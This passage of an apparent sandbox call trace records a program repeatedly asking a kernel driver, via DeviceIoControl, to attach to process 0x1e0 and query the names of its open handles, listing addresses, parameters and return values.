Size=0x808) returned 0x2d0b20 [0136.378] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0136.378] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.378] PsAcquireProcessExitSynchronization () returned 0x0 [0136.378] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.378] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000a07620, HandleInformation=0x0) returned 0x0 [0136.378] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.379] PsReleaseProcessExitSynchronization () returned 0x2 [0136.379] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.379] ObQueryNameString (in: Object=0xfffff8a000a07620, ObjectNameInfo=0xfffffa8002aed044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002aed044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.379] ObfDereferenceObject (Object=0xfffff8a000a07620) returned 0x2 [0136.379] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.379] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.414] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.414] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x28, lpOverlapped=0x0) returned 1 [0136.415] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.415] PsAcquireProcessExitSynchronization () returned 0x0 [0136.415] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.415] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a004473aa0, HandleInformation=0x0) returned 0x0 [0136.415] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.415] PsReleaseProcessExitSynchronization () returned 0x2 [0136.415] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.415] ObQueryNameString (in: Object=0xfffff8a004473aa0, ObjectNameInfo=0xfffffa8002aec044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002aec044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.415] ObfDereferenceObject (Object=0xfffff8a004473aa0) returned 0x2 [0136.415] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.415] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.415] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.415] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.415] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.415] PsAcquireProcessExitSynchronization () returned 0x0 [0136.415] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.415] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800bd6c500, HandleInformation=0x0) returned 0x0 [0136.415] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.416] PsReleaseProcessExitSynchronization () returned 0x2 [0136.416] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.416] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002ae3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ae3044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.416] ObfDereferenceObject (Object=0xfffffa800bd6c500) returned 0x1 [0136.416] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.416] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.416] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.416] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.416] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.416] PsAcquireProcessExitSynchronization () returned 0x0 [0136.416] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.416] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036b9f20, HandleInformation=0x0) returned 0x0 [0136.416] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.417] PsReleaseProcessExitSynchronization () returned 0x2 [0136.417] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.417] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002c0f044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002c0f044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.417] ObfDereferenceObject (Object=0xfffffa80036b9f20) returned 0x1 [0136.417] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.417] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.417] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.417] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0136.417] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.417] PsAcquireProcessExitSynchronization () returned 0x0 [0136.417] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.417] ObReferenceObjectByHandle (in: Handle=0x1b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000a2b240, HandleInformation=0x0) returned 0x0 [0136.417] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.417] PsReleaseProcessExitSynchronization () returned 0x2 [0136.418] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.418] ObQueryNameString (in: Object=0xfffff8a000a2b240, ObjectNameInfo=0xfffffa8002c10044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002c10044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.418] ObfDereferenceObject (Object=0xfffff8a000a2b240) returned 0x2 [0136.418] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.418] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.418] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.418] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0136.418] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.418] PsAcquireProcessExitSynchronization () returned 0x0 [0136.418] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.418] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036a8f20, HandleInformation=0x0) returned 0x0 [0136.418] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.418] PsReleaseProcessExitSynchronization () returned 0x2 [0136.418] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.419] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002c12044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002c12044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.419] ObfDereferenceObject (Object=0xfffffa80036a8f20) returned 0x1 [0136.419] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.419] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.419] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.419] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.419] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.419] PsAcquireProcessExitSynchronization () returned 0x0 [0136.419] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.419] ObReferenceObjectByHandle (in: Handle=0x354, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036bebb0, HandleInformation=0x0) returned 0x0 [0136.419] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.419] PsReleaseProcessExitSynchronization () returned 0x2 [0136.419] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.419] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002cdc044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002cdc044, ReturnLength=0xfffff88005163508) returned 0x0 [0136.420] ObfDereferenceObject (Object=0xfffffa80036bebb0) returned 0x1 [0136.420] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.420] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.420] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.420] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0136.420] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.420] PsAcquireProcessExitSynchronization () returned 0x0 [0136.420] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.420] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036be910, HandleInformation=0x0) returned 0x0 [0136.420] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.421] PsReleaseProcessExitSynchronization () returned 0x2 [0136.421] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.421] ObQueryNameString (in: Object=0xfffffa80036be910, ObjectNameInfo=0xfffffa8002d61044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002d61044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.421] ObfDereferenceObject (Object=0xfffffa80036be910) returned 0x1 [0136.421] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.421] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.421] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.421] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0136.421] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.421] PsAcquireProcessExitSynchronization () returned 0x0 [0136.421] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.422] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036bcb20, HandleInformation=0x0) returned 0x0 [0136.422] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.422] PsReleaseProcessExitSynchronization () returned 0x2 [0136.422] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.422] ObQueryNameString (in: Object=0xfffffa80036bcb20, ObjectNameInfo=0xfffffa8002d63044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002d63044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.422] ObfDereferenceObject (Object=0xfffffa80036bcb20) returned 0x1 [0136.422] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.422] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.422] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.422] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.423] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.423] PsAcquireProcessExitSynchronization () returned 0x0 [0136.423] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.423] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036a68e0, HandleInformation=0x0) returned 0x0 [0136.423] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.423] PsReleaseProcessExitSynchronization () returned 0x2 [0136.423] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.423] ObQueryNameString (in: Object=0xfffffa80036a68e0, ObjectNameInfo=0xfffffa8002d68044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002d68044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.423] ObfDereferenceObject (Object=0xfffffa80036a68e0) returned 0x1 [0136.423] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.423] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.423] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.424] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0136.424] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.424] PsAcquireProcessExitSynchronization () returned 0x0 [0136.424] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.424] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036a08d0, HandleInformation=0x0) returned 0x0 [0136.424] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.424] PsReleaseProcessExitSynchronization () returned 0x2 [0136.424] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.424] ObQueryNameString (in: Object=0xfffffa80036a08d0, ObjectNameInfo=0xfffffa8002dea044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002dea044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.424] ObfDereferenceObject (Object=0xfffffa80036a08d0) returned 0x1 [0136.424] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.424] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.425] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.425] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0136.425] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.425] PsAcquireProcessExitSynchronization () returned 0x0 [0136.425] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.425] ObReferenceObjectByHandle (in: Handle=0x3c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036a1a50, HandleInformation=0x0) returned 0x0 [0136.425] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.425] PsReleaseProcessExitSynchronization () returned 0x2 [0136.425] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.425] ObQueryNameString (in: Object=0xfffffa80036a1a50, ObjectNameInfo=0xfffffa8002e15044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002e15044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.425] ObfDereferenceObject (Object=0xfffffa80036a1a50) returned 0x2 [0136.425] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.425] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.425] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.426] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0136.426] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.426] PsAcquireProcessExitSynchronization () returned 0x0 [0136.426] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.426] ObReferenceObjectByHandle (in: Handle=0x3c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80036a1900, HandleInformation=0x0) returned 0x0 [0136.426] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.426] PsReleaseProcessExitSynchronization () returned 0x2 [0136.638] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.638] ObQueryNameString (in: Object=0xfffffa80036a1900, ObjectNameInfo=0xfffffa8002e1d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002e1d044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.638] ObfDereferenceObject (Object=0xfffffa80036a1900) returned 0x1 [0136.638] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.638] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.638] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.638] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0136.638] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.638] PsAcquireProcessExitSynchronization () returned 0x0 [0136.638] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.639] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003674740, HandleInformation=0x0) returned 0x0 [0136.639] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.639] PsReleaseProcessExitSynchronization () returned 0x2 [0136.639] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.639] ObQueryNameString (in: Object=0xfffffa8003674740, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0136.639] ObfDereferenceObject (Object=0xfffffa8003674740) returned 0x1 [0136.639] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.639] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.639] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.639] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0136.639] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.639] PsAcquireProcessExitSynchronization () returned 0x0 [0136.639] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.639] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003903b30, HandleInformation=0x0) returned 0x0 [0136.639] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0136.639] PsReleaseProcessExitSynchronization () returned 0x2 [0136.639] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xe6 [0136.639] ObQueryNameString (in: Object=0xfffffa8003903b30, ObjectNameInfo=0xfffffa80025f17c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025f17c4, ReturnLength=0xfffff88005163550) returned 0x0 [0136.639] ObfDereferenceObject (Object=0xfffffa8003903b30) returned 0x1 [0136.639] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0136.640] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0136.640] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0136.640] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0136.640] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0136.640] PsAcquireProcessExitSynchronization () returned 0x0 [0136.640] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880051635d0) [0136.640] ObReferenceObjectByHandle (in: Handle=0x5b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, 